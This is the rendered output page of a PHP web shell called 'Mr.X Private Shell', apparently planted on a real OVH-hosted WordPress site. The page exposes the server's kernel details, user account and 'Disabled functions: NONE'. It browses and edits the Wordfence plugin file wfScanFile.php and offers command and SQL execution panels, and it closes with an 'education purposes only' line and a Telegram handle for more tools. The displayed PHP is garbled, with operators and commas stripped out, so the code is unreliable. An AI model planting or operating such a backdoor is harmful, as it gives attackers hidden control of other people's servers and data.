Uname: Linux webm005.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: 6036 (villadal)
Group: 100 (users)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//home/villadal/www/wp-content/plugins///wordfence///lib      ( Reset | Go to )
File Name: wfScanFile.php
Edit
<?php

require_once __DIR__ '/wfFileUtils.php';
require_once 
__DIR__ '/wfScanFileProperties.php';

class 
wfScanFile {

    private 
$realPath null;
    private 
$wordpressPath null;

    public function 
__construct($realPath$wordpressPath) {
        
$this->realPath $realPath;
        
$this->wordpressPath $wordpressPath;
    }

    public function 
getRealPath() {
        return 
$this->realPath;
    }

    public function 
getWordpressPath() {
        return 
$this->wordpressPath;
    }

    public function 
getDisplayPath() {
        if (
wfFileUtils::matchPaths($this->realPath$this->wordpressPath)) {
            return 
'~/' $this->getWordpressPath();
        }
        return 
$this->realPath;
    }

    public function 
createChild($childPath) {
        return new 
self(
            
wfFileUtils::realPath(wfFileUtils::joinPaths($this->realPath$childPath)),
            
wfFileUtils::joinPaths($this->wordpressPath$childPath)
        );
    }

    public function 
__toString() {
        return 
$this->getRealPath();
    }

    public function 
initializeProperties() {
        return new 
wfScanFileProperties($this->realPath$this->wordpressPath);
    }

}

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL